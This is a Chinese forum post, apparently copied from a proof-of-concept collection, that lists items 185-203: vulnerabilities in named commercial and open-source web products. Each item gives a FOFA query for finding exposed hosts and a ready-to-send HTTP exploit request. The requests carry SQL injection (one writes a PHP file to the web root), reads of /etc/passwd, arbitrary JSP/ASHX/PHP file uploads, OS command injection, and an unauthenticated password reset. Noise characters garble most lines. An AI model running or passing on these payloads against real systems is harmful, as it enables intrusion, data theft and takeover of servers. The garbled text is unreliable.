# u8 O4 P4 k7 q. K* }# | t
! n& t+ w, t) d8 V( k9 s- e/ R, A( D; k$ r
185. 瑞友天翼应用虚拟化系统SQL注入
: e4 H) {7 K$ s4 bversion < 7.0.5.1
" z! v: K% S/ s% c: C* H0 ZFOFA:app="REALOR-天翼应用虚拟化系统"
8 `9 w* h9 ?: W' T3 e) nGET /index.php?s=/Admin/appsave&appid=3%27%29%3Bselect+unhex%28%273c3f706870206563686f206d643528223122293b202466696c65203d205f5f46494c455f5f3b20756e6c696e6b282466696c65293b%27%29+into+outfile+%27.%5C%5C..%5C%5C..%5C%5CWebRoot%5C%5Cplom.xgi%27%23 HTTP/1.17 O% u, Y. H( q& G. F7 V
Host: host
2 x# Q. P8 `$ N) }2 r5 G
+ s3 r8 R4 U3 A$ U, R
, ^0 ^2 u5 t. }0 h, \4 f8 R1 Y: e186. F-logic DataCube3 SQL注入0 C1 C* Z: t! O/ W
CVE-2024-31750
4 @ t" u# r& _" hF-logic DataCube3是一款用于光伏发电系统的紧凑型终端测量系统
0 C) [" @7 d* A( a7 A& CFOFA:title=="DataCube3"- U! c3 J) m. O9 i& [' ?% S: V- @, A
POST /admin/pr_monitor/getting_index_data.php HTTP/1.1
4 ?- p) p3 e* y" S; v( Q4 XHost: your-ip/ p$ W4 \. J) f7 S5 Y
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0. b2 G0 s( |- O% }6 P" J/ P2 @, m6 }
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8( |' Z' P& o9 k2 M. O( L
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2/ \ Y& P9 I" ?0 l6 s4 o
Accept-Encoding: gzip, deflate
- U: L2 K- D9 H, E& _& yConnection: close
% c' P( I5 S( [; d# g9 p( mContent-Type: application/x-www-form-urlencoded7 ^9 ^" U6 h" P' i
4 t) }: _/ s5 ~, preq_id=1) AND 1113=LIKE(CHAR(65,66,67,68,69,70,71),UPPER(HEX(RANDOMBLOB(500000000/2)))) AND (1450=14502 s' _4 z% ~- @' O0 m. z! y1 K9 _
8 B5 j, D( k0 [, U9 c
* y0 A) e2 Y3 z0 @) M& H187. Mura CMS processAsyncObject SQL注入+ M% r: K- i8 c( N
CVE-2024-32640
8 z1 E2 r0 D+ @! I/ @0 a4 aFOFA:"Mura CMS"2 A: O" `; X2 O8 B) T
POST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.1" X- _/ M. `, S6 J! W
Host: your-ip
% u9 f/ z( B8 [' M- z1 D0 z. p; K0 BContent-Type: application/x-www-form-urlencoded1 g! \; `1 Q& v* R& n
# ]9 ]* Q7 t8 E2 M0 V# K' e
: _; i3 j- I4 @ K# z2 T7 Oobject=displayregion&contenthistid=x%5c' AND (SELECT 3504 FROM (SELECT(SLEEP(5)))MQYa)-- Arrv&previewid=1" @2 Z! j; `6 X6 n5 a" h/ L
3 ]3 k- x. q- u) b8 T$ G; v" ^( l; b& K7 [- j9 U
188. 叁体-佳会视频会议 attachment 任意文件读取
- A3 I% `: L% ]) E8 ~5 h. vversion <= 3.9.75 Z* {4 S( E8 g! v
FOFA:body="/system/get_rtc_user_defined_info?site_id"
( K# I1 m' p* KGET /attachment?file=/etc/passwd HTTP/1.1- E2 T5 s- g3 B' z
Host: your-ip& K7 W& a: T3 \; z
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
( r4 I+ A% i- k4 A) x+ HAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
7 i5 M+ x) R4 }2 AAccept-Encoding: gzip, deflate; ]) B9 g2 `5 W2 i- c% X4 K
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
4 s5 ?5 N) j7 O$ j0 f( ^Connection: close5 \1 O4 ?/ w4 O# d: b) E% M
( a. a/ q: j. O3 Q/ r% h" \! Q% L
- A: h9 e% ~ H! ~& ]; v. I
189. 蓝网科技临床浏览系统 deleteStudy SQL注入# t- ?, \$ a6 h0 Y$ m. R/ ^
FOFA:app="LANWON-临床浏览系统"- t3 ?! S( S& b, C% e
GET /xds/deleteStudy.php?documentUniqueId=1%27;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1
( E9 ~* [* R) n, Z$ AHost: your-ip$ N i; i# h1 @- s/ `' S
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
7 I. F+ G# J- `7 zAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7% V$ Z0 x1 ~3 `3 a6 _# K
Accept-Encoding: gzip, deflate
' J h% m7 \0 h2 ?! G1 iAccept-Language: zh-CN,zh;q=0.9
/ E7 ?+ d, P7 ?4 n& NConnection: close: l7 V; M. l0 M5 i/ H
6 T2 M' `; G+ e k
, V; Z- o9 y. t/ ?190. 短视频矩阵营销系统 poihuoqu 任意文件读取
5 ~1 ?; F0 @( `. L0 s q" fFOFA:title=="短视频矩阵营销系统"
# W& H! C4 I* V( J1 `POST /index.php/admin/Userinfo/poihuoqu HTTP/2
0 J$ {8 v0 a4 M( ]( X0 Q8 mHost: your-ip
, a( e, x% }+ l$ aUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36
- c, x' D6 Q5 w4 vAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
5 ~1 c# U# A- \9 @" s: nContent-Type: application/x-www-form-urlencoded. \/ @1 w0 J$ K" H
Accept-Encoding: gzip, deflate6 E/ k8 o+ ]/ `2 W
Accept-Language: zh-CN,zh;q=0.9: X" s. y" a# }7 a) u+ I+ L
7 ~$ O: Q9 K* p- |- R/ u
poi=file:///etc/passwd+ ~3 b7 m) v) s* B6 A
& B2 `/ J- K2 ~, Z
4 v) R3 S6 u' c: u7 I191. 亿赛通电子文档安全管理系统 NavigationAjax SQL注入+ B; L" P" f7 r
FOFA:body="/CDGServer3/index.jsp"% ?7 [' O f6 G2 @. i, d7 \
POST /CDGServer3/js/../NavigationAjax HTTP/1.1
2 d6 n+ @, u8 g9 H' O9 Q$ bHost: your-ip6 H2 L( Z! j4 X) c% i8 O; q& H9 q
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
9 V: U2 w8 O0 Q- O/ RContent-Type: application/x-www-form-urlencoded
0 F4 `1 U8 O, G% F# _6 ?7 [
+ a- p2 _* O1 |2 b/ {& `0 K! a) B. {command=nav&id=1'waitfor delay '0:0:5'--+&name=&openId=
5 ~2 }. e" n9 R. [
$ Q! e; d* y# x
' r5 Q/ h. l( T% h! c6 K192. 富通天下外贸ERP UploadEmailAttr 任意文件上传
4 W2 ~' G- q U [( ZFOFA:title="用户登录_富通天下外贸ERP"
, Q6 @4 @3 Q$ O8 g. }* ^POST /JoinfApp/EMail/UploadEmailAttr?name=.ashx HTTP/1.13 M7 f' o. j" l
Host: your-ip5 S6 W7 B* X' H0 z
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36* m R- z# Y9 i! [
Content-Type: application/x-www-form-urlencoded2 S$ W" o; k& P7 @; g/ a
Y) V6 i9 i% C- l) ^1 y
S- d }. L5 F! E<% @ webhandler language="C#" class="AverageHandler" %>" _) e# Z1 X; x r1 T
using System;- Q2 D) e4 ^: i; }( U3 m+ E
using System.Web;4 a3 Z- s. L7 ^
public class AverageHandler : IHttpHandler
+ X. J# e" S. d @6 I1 C$ \{' A* a6 [0 U. f4 {) D4 g3 H' R
public bool IsReusable7 Y& G7 a: X' I, Z" G+ p( n
{ get { return true; } }: ?2 d3 C& I, @0 ~! _3 b
public void ProcessRequest(HttpContext ctx)
% R$ Y3 E) A$ g) b! h0 o& G{
) f8 r t4 o6 c a8 N" a/ \( Lctx.Response.Write("test");# C- W% u, C$ T# f3 J
}# Y8 y: i: C# w3 w. E9 W" j
}
2 d- }) f- A( Q( f/ P, V; F2 B2 k% A* L# j
( i. K6 q! I5 n& Q/ a
193. 山石网科云鉴安全管理系统 setsystemtimeaction 命令执行
$ N0 b: W1 |& a3 M( V* Z/ O9 eFOFA:body="山石云鉴主机安全管理系统"9 [4 l0 k0 c/ n. _
GET /master/ajaxActions/getTokenAction.php HTTP/1.17 ]0 c. c% X- b b
Host:
$ a$ Q h* ]8 H! f' _Cookie: PHPSESSID=2333333333333;7 `, d7 s' \" @
Content-Type: application/x-www-form-urlencoded. M; n6 I# Q: V" l( O, k
User-Agent: Mozilla/5.0
; Z1 x3 y" A! A& F, }$ |6 C: G1 e. a2 U# j8 V
& a6 r5 A/ Y; K: v4 s: cPOST /master/ajaxActions/setSystemTimeAction.php?token_csrf={{token}} HTTP/1.1/ y! G/ O7 G, i0 y
Host:
x- ^- w; ]7 y9 yUser-Agent: Mozilla/5.0, J# z3 g2 H8 j- q' D
Accept-Encoding: gzip, deflate# V" y5 g) `3 z1 g1 @
Accept: */*
$ K+ J' S; X3 _) A, o" f9 [Connection: close
- D" F: M; N- X7 dCookie: PHPSESSID=2333333333333;
6 W" H' a& ^' I- PContent-Type: application/x-www-form-urlencoded
6 G+ X% D& M+ R1 F) `2 c8 [Content-Length: 84
+ f$ B9 _" u7 L7 o$ {4 i' X+ {/ S: r1 R M h, ?* S: J
param=os.system('echo 23333333333456 > /opt/var/majorsec/installation/master/runtime/img/config')
E7 k8 j1 a; C( |0 f
: O/ b6 m, {( M a6 z8 p2 T( _, h9 A; O p8 `( R' r, l
GET /master/img/config HTTP/1.1 C1 C, x6 w5 q1 T
Host:
, R7 u, o8 Z+ EUser-Agent: Mozilla/5.0
; ^! I& d1 H6 b
* c( f" w" O T0 r
1 @* R( _/ y0 a194. 飞企互联-FE企业运营管理平台 uploadAttachmentServlet 任意文件上传) O E3 c+ @: S. ]7 j
FOFA:app="FE-协作平台"访问 /servlet/uploadAttachmentServlet 有返回则漏洞存在
/ n, M! N; G7 ]% I
- t0 Z, T) Q" y; l1 WPOST /servlet/uploadAttachmentServlet HTTP/1.16 p/ Z% l O) d8 O
Host: host
8 E, f: G$ Z) r; I/ o+ YUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36# o% V5 H+ f1 T. ^; ^( d
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.89 ~. O+ J" l4 V; K9 m* l2 R
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.26 z$ k8 x1 @' _5 v
Accept-Encoding: gzip, deflate
0 \ I# y& j; J& m" o. t" ^Connection: close
: W. C+ U. T: A$ {, _6 CContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryKNt0t4vBe8cX9rZk
' X# M2 {- l, }/ [5 \; _5 A------WebKitFormBoundaryKNt0t4vBe8cX9rZk
* k7 J9 k) c B+ s) H
- B( K* R8 R/ J+ v6 ?Content-Disposition: form-data; name="uploadFile"; filename="../../../../../jboss/web/fe.war/hello.jsp"0 Z9 k! A. d4 |
Content-Type: text/plain5 G; M9 X; d$ K/ u- w$ S! j0 i6 M
<% out.println("hello");%>
, }! K$ S& K1 p; |4 N# c6 l6 Y, I------WebKitFormBoundaryKNt0t4vBe8cX9rZk( `: s$ y$ U: S: y. y
Content-Disposition: form-data; name="json"
) f3 q- y6 |; a$ z: |$ w/ P7 o0 G {"iq":{"query":{"UpdateType":"mail"}}}
6 U4 P1 a) V( E& ?# x------WebKitFormBoundaryKNt0t4vBe8cX9rZk--: m, U4 m; s$ y+ Z' L. O
0 r- v3 A( a2 ^# v# A9 D, p
, n V$ S' b6 b! j; e) s! s( k195. 飞鱼星上网行为管理系统 send_order.cgi命令执行
1 {* i' Q1 y/ ^3 g4 U) k4 mFOFA:title=="飞鱼星企业级智能上网行为管理系统
) q/ n" s2 r- i8 K6 l. iPOST /send_order.cgi?parameter=operation HTTP/1.19 F& C. _$ I( e' X8 L
Host: 127.0.0.1
" M: u* F2 X. z# z+ P; w6 q. gPragma: no-cache
* Z" s, P- b0 {$ vCache-Control: no-cache
. v, _+ a* Y7 ~0 LUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.364 _; Y1 u, I2 M, X" f3 ?! a
Accept: */*
, B8 {" i. ?1 q& Z+ Q7 J$ wAccept-Encoding: gzip, deflate
7 C" {# A s: [# ]) WAccept-Language: zh-CN,zh;q=0.9
n- U$ {1 O1 P% Y' TConnection: close
$ ^6 q) ]4 Y+ M) Q! rContent-Type: application/x-www-form-urlencoded
) |0 d* C1 m7 U4 uContent-Length: 68
: f9 p% G- P2 T) o
: w, E" j5 H+ K4 X{"opid":"777777777777777777","name":";uname -a;echo ","type":"rest"}5 s; ~8 Y. ]9 A1 _
8 G7 [3 w" a9 I/ D3 n9 Y- Q8 B: \) G. P* h8 d* k
196. 河南省风速科技统一认证平台密码重置0 p; ~" n, p( P) }( C- k! h8 L; r
FOFA:body="/cas/themes/zbvc/js/jquery.min.js" `$ k# b n' P& w: y' z
POST /cas/userCtl/resetPasswordBySuper HTTP/1.1$ }( \3 P( K- N- T
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36: ^! M: M2 \+ V5 x- q! K) T% Y% o0 B
Content-Type: application/json;charset=UTF-8
% G- v, F- g2 M( h1 v* I0 SX-Requested-With: XMLHttpRequest
- N$ u F$ I5 l4 {) [1 z* WHost:8 s. s. h( Y( T9 _) C, K: I; T
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
; x( x) r0 ]2 ^( k( KContent-Length: 45* {8 z9 D, I) b, ~0 F! \2 e
Connection: close9 G) x9 L5 x4 r$ d. ~/ @
4 \2 f4 I3 Z* T% |/ R{"xgh":"test","newPass":"test666","email":""}# ?, e6 C2 D3 Y/ J" l& O
5 J* O- N# {8 T# Q0 [: ]' G: H0 }" F
" e1 w# R3 y: c2 t- \
197. 浙大恩特客户资源管理系统-Quotegask_editAction存在SQL注入
5 v w6 [% @9 Y+ p) RFOFA:app="浙大恩特客户资源管理系统"' l) s5 Y2 e# |' z' W4 @
GET /entsoft/Quotegask_editAction.entweb;.js?goonumStr=1')+UNION+ALL+SELECT+111*111--+&method=goonumIsExist HTTP/1.1
9 w' B7 S3 c, P% H, }! GHost:
0 w5 e5 l$ A3 m$ PUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36
; O8 r D. f. A4 W+ P8 ]3 Y4 dAccept-Encoding: gzip, deflate" b5 z6 h U6 g. N( r7 Q, c
Connection: close
, z S" A9 x: }
, c; e$ W) L8 d$ R1 p
2 E: q S1 k$ ~# w( `) N. B4 ?# T5 e3 y9 @" h
198. 阿里云盘 WebDAV 命令注入
) l) e% E4 h' i! `CVE-2024-29640- `! M4 u/ a. y
GET /cgi-bin/luci/admin/services/aliyundrive-webdav/query?sid=%60%6c%73%20%2f%3e%2f%77%77%77%2f%61%61%61%2e%74%78%74%60%20 HTTP/1.1' E. I2 S4 H- k, ]2 v' U4 T$ n
Cookie: sysauth=41273cb2cffef0bb5d0653592624cf64) ~" z# ] [$ E8 u* n1 I0 r
Accept: */*
& Y% ~( I/ d F) l/ kAccept-Encoding: gzip, deflate9 A( Y6 E# Z4 ^. Y) A6 T5 F
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.62 p4 f& O# C/ f
Connection: close" X: v7 d. |9 `! n- }
7 n5 x" t% k3 }0 X2 f* u6 D: d! v& L/ z2 e- n
199. cockpit系统assetsmanager_upload接口 文件上传# }: ]* H- Z6 D$ ?3 f) S7 K9 Y
2 c7 }- x) q6 I$ S8 @3 g) S* O+ b1.执行poc进行csrf信息获取,并获取cookie,再上传访问得到结果:
& v8 x9 u U% w, l; Y; H' PGET /auth/login?to=/ HTTP/1.18 h g1 w3 N0 K
: u" I1 m* s0 |$ I1 z响应:200,返回值:csfr:"eyJ0eXAi0iJKV1QiLCJhbGci0iJIUsI1NiJ9.eyJjc2ZyIjoibG9naW4ifQ.6KvuRJo3-Dp2UouwGH9D8cmnXEL4NGNen9CX3ex86cw"
) |+ q5 [0 [! a" O- l: n' P% C- M% ^* I" H. }- M3 Q, i" A
2.使用刚才上一步获取到的jwt获取cookie:
; M( e/ _8 e% R
9 K6 y2 P7 r& w/ F i& o+ b0 D3 EPOST /auth/check HTTP/1.1
( w, F1 A. v" B/ k& @7 g( RContent-Type: application/json
( [, t7 p' W& q; | i: m$ a8 F; m! m- O9 e$ E
{"auth":{"user":"admin","password":"admin"},"csfr":"eyJ0eXAi0iJKV1QiLCJhbGci0iJIUsI1NiJ9.eyJjc2ZyIjoibG9naW4ifQ.6KvuRJo3-Dp2UouwGH9D8cmnXEL4NGNen9CX3ex86cw"}
0 @/ ?3 K, k& E. H4 r3 G- q5 H3 M7 \! k
响应:200,返回值:) @+ x0 @2 a5 h
Set-Cookie:mysession=95524f01e238bf51bb60d77ede3bea92: path=/% Q7 W( H4 L$ \8 s' B1 w8 R% H
Fofa:title="Authenticate Please!"3 J8 {# f" n" V' |8 {2 ~0 I
POST /assetsmanager/upload HTTP/1.1. u+ D; r/ `( L
Content-Type: multipart/form-data; boundary=---------------------------36D28FBc36bd6feE7Fb32 g. C; B/ ?& Q& J
Cookie: mysession=95524f01e238bf51bb60d77ede3bea92
# c5 o* }4 G7 b8 q) E( w
2 n. a/ [3 c" |& G% u9 w0 B-----------------------------36D28FBc36bd6feE7Fb3
( `' r& Q% N6 b3 c2 B+ F u% BContent-Disposition: form-data; name="files[]"; filename="tttt.php"
: T0 Y& r6 r0 x* ?; p9 e) ]Content-Type: text/php
5 m' b: h& P1 d& |" o9 P! n X8 T7 f5 H2 C% A) d1 g$ ]" g' N
<?php echo "tttt";unlink(__FILE__);?>
2 P3 m. ]9 C# t% l-----------------------------36D28FBc36bd6feE7Fb3
- n' z* E3 F; | q1 SContent-Disposition: form-data; name="folder"1 s( y$ P2 {0 {% T$ ]) u8 `/ |
$ _$ ~' c( M0 Y) h! Q-----------------------------36D28FBc36bd6feE7Fb3--
0 h# \$ _5 p: D1 B, ?
5 p3 q( X' l0 f
" I4 H0 i9 R+ F! [; j/ d' ]# @/storage/uploads/tttt.php
* M8 ~5 r* N) z& b, G2 r" M
& f ] D% M: T3 m1 q: S200. SeaCMS海洋影视管理系统dmku SQL注入5 ^9 T6 p2 h" [1 I9 p: t
FOFA:app="海洋CMS"
0 I$ T3 \. Y7 u% AGET /js/player/dmplayer/dmku/?ac=del&id=(select(0)from(select(sleep(5)))v)&type=list HTTP/1.1/ c6 D9 S# \% x# x/ ]0 G2 [
Cookie: PHPSESSID=hlfl5flck9q3ng1blehhv86s4s a: l+ _6 v0 N/ L# R. P$ x, \7 I
Upgrade-Insecure-Requests: 1
/ P. w7 f0 v4 M: kCache-Control: max-age=0
, E' c7 C1 e( k$ s. U8 ]) p) YAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.72 A6 Y n1 C/ A6 |+ x; z
Accept-Encoding: gzip, deflate5 {- p$ I+ r( i
Accept-Language: zh-CN,zh;q=0.9
/ A8 x- U9 J/ w2 b" q1 b
" ?3 \7 f# m) {
4 K5 m! T! p: U% P {+ Y* ?+ p201. 方正全媒体新闻采编系统 binary SQL注入
& j6 S. V4 `: q5 a* D4 }FOFA:body="/newsedit/newsedit/" || app="FOUNDER-全媒体采编系统"
. z; d/ c2 d2 b+ fPOST /newsedit/newsplan/task/binary.do HTTP/1.1
0 ^: m, t* P+ `8 fContent-Type: application/x-www-form-urlencoded
% W& [, T( m, {& z' d& a; b( yAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
. e, F3 `5 `, L7 l# @/ V0 ?; dAccept-Encoding: gzip, deflate) z4 C: a* G1 t% U# X
Accept-Language: zh-CN,zh;q=0.9
3 |7 f1 j; ?2 ?* L" wConnection: close
, [8 c J( T; n) X* a. V: C1 l/ C4 X, @/ c( v& z. {
TableName=DOM_IMAGE+where+REFID%3D-1+union+select+%271%27%3B+WAITFOR+DELAY+%270%3A0%3A5%27%3Bselect+DOM_IMAGE+from+IMG_LARGE_PATH&FieldName=IMG_LARGE_PATH&KeyName=REFID&KeyID=1
" I7 D" c, _3 u& k2 Y% a( N$ h9 N% V! t: g. Z! S( U/ x& z
. w2 Q% S& H# H& W
202. 微擎系统 AccountEdit任意文件上传
5 M. O, Z2 i2 k1 s9 y+ E" ]FOFA:body="/Widgets/WidgetCollection/"
" ~! N# L V. ~$ p获取__VIEWSTATE和__EVENTVALIDATION值; i/ `+ U! w4 x _2 k3 \
GET /User/AccountEdit.aspx HTTP/1.1
! b4 e* F+ K: w" B6 |Host: 滑板人之家
. b4 B/ n6 `6 tUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/531.36 (KHTML, like Gecko) Chrome/83.0.4103.112 Safari/537.31
9 W7 w- n$ e( O5 |) d( |Content-Length: 0
" Q8 C& y7 x8 G+ S* F' N1 B
9 y& t* i' ?; @
5 q& o3 P9 |: e替换__VIEWSTATE和__EVENTVALIDATION值
. X; ^( p o$ ^3 p( W5 xPOST /User/AccountEdit.aspx HTTP/1.1
8 O; n/ M7 F7 J7 W3 EAccept-Encoding: gzip, deflate, br; V' i' F! e a7 Y# g. v
Content-Type: multipart/form-data;boundary=---------------------------786435874t38587593865736587346567358735687
$ a: G' i$ ^. [: Z
- M, p y/ G! w' c- N! k-----------------------------786435874t385875938657365873465673587356878 K9 E7 g6 q+ _7 @% }( r
Content-Disposition: form-data; name="__VIEWSTATE"
' x, J r: d5 f e) }
0 A Z# q! l8 ^% {# l" Z6 Q! @__VIEWSTATE
# O: W* i( v- k" u9 O( {-----------------------------786435874t38587593865736587346567358735687* t2 i! u. j, f+ v, q
Content-Disposition: form-data; name="__EVENTVALIDATION"; B, n) _+ t! \0 j. P( N
% v. y0 Y7 B% X) Z5 n6 T
__EVENTVALIDATION
& S- m4 O+ ]- Y/ @% p w$ e-----------------------------786435874t38587593865736587346567358735687
; H7 F o8 P# t! x9 VContent-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$upload"; filename="1123.txt"% [1 }! K$ B# C( k
Content-Type: text/plain) X; E- J e! b4 H
$ D& u' `8 C4 o6 d2 wHello World! N& _+ y$ X W) o) b H8 @, N
-----------------------------786435874t385875938657365873465673587356872 q% `) ~/ G; ?! l% R
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$bttnUpload"
o. X7 E$ E- Y! f
J8 {/ y2 k; t9 O4 @上传图片
$ }: I, q# q3 @2 a; f4 V-----------------------------786435874t38587593865736587346567358735687/ D- O2 j. c/ y& y
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtLastName"
: `; E+ x% A7 D/ @, f& @& U9 g( ^5 T( B' ]7 W" L
3 b. v$ N, h4 P- j& y% |% z0 S-----------------------------786435874t385875938657365873465673587356871 f6 q# z/ u, p, ]! o5 Z
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtEmail"
) E ~5 y% c" c4 t" t& q8 T9 `& [2 u
$ |! \8 `) R! @( r- q$ m' b9 @1 ^3 J
5 F$ U6 e% {; d5 T+ L: B-----------------------------786435874t38587593865736587346567358735687--+ |! f- j, m4 v) T: p9 p
3 E( G, `6 L% L/ \9 c3 D
" I( w3 d% p2 h& U! ~
/_data/Uploads/1123.txt, a C, k1 x g. J) r# D
$ L0 Z$ z0 ^7 e8 w
203. 红海云EHR PtFjk 文件上传
% K# p$ ]- m& R: M+ N/ ^5 O) AFOFA:body="RedseaPlatform"
! ^8 k' g) T# e& v" w( L& J- u' k5 qPOST /RedseaPlatform/PtFjk.mob?method=upload HTTP/1.1
3 v" D+ p- [1 ~9 \/ d! v$ _Host: x.x.x.x$ \ [4 |" i1 J2 w
Accept-Encoding: gzip* d- i$ D+ W9 K4 E0 z
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15& e% v% P& F5 [% _
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryt7WbDl1tXogoZys4
2 v8 _3 x- { g' BContent-Length: 210. j# H) K) E" l5 {) V0 f o$ \2 _
. i* M P' C) y; ~$ Y------WebKitFormBoundaryt7WbDl1tXogoZys4
! W5 O- \/ f, y% @" |1 BContent-Disposition: form-data; name="fj_file"; filename="11.jsp"
9 f2 z9 P% _% K4 r7 a z6 DContent-Type:image/jpeg
6 F1 D, l) H2 c1 F/ q7 |' Z4 [# w: f( ]+ p$ W
<% out.print("hello,eHR");%>
( N: `& A% r' y( `& m------WebKitFormBoundaryt7WbDl1tXogoZys4--/ K2 |) j5 `+ O
' D! m& J3 I- y( `: D7 r
0 `+ r) T7 B( I# m/ \) v! K1 z; K! s9 R) \" t; j. c
8 x6 v- {2 X5 F8 U5 j7 i; S# m
+ M0 a: ~( X: I8 z- ]
7 k3 o+ ]" N+ V2 ~/ c" s: S
|
发表于 2024-6-5 14:31:29
收藏
支持
反对